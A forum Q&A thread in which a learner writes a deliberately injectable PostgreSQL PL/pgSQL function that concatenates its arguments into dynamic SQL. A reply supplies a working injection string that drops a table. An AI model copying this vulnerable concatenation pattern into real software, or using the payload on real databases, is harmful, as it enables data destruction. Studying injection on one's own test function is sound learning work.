I'm trying to make an SQL injection in my own function in PostgreSQL 13



  • Just for learning purposes, I'm trying to create a function using PLPGSQL and make an SQL injection on it. I recently learned about format, USING and quote_literal and quote_indent, so I'm good about avoiding an SQL injection. What I'm trying to do is create a function that allows an SQL injection (i.e. a drop table).

    So I wrote this:

    create or replace function badfunc(tablename text, identifier int4)
    returns setof character varying as $$
    declare
        query text;
    begin
        query := 'select full_name from ' || $1 || ' where re = ' || $2 ||'';
        raise notice 'query: %', query;
        return query execute query;
    end;
    $$ language 'plpgsql';
    

    But when I execute this function with select badfunc('; drop table tb_students;', 1001); I get this error:

    [42601] ERROR: syntax error at or near ";" where: function PL/pgSQL badfunc(text,integer) linha 7 in RETURN QUERY
    

    So I think that's not how it is done. How can I achieve this SQL injection?



  • You have to make it a valid SQL statement:

    SELECT badfunc('(VALUES ('done')) AS x(fullname); drop table tb_students; --', 1001);
    



Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2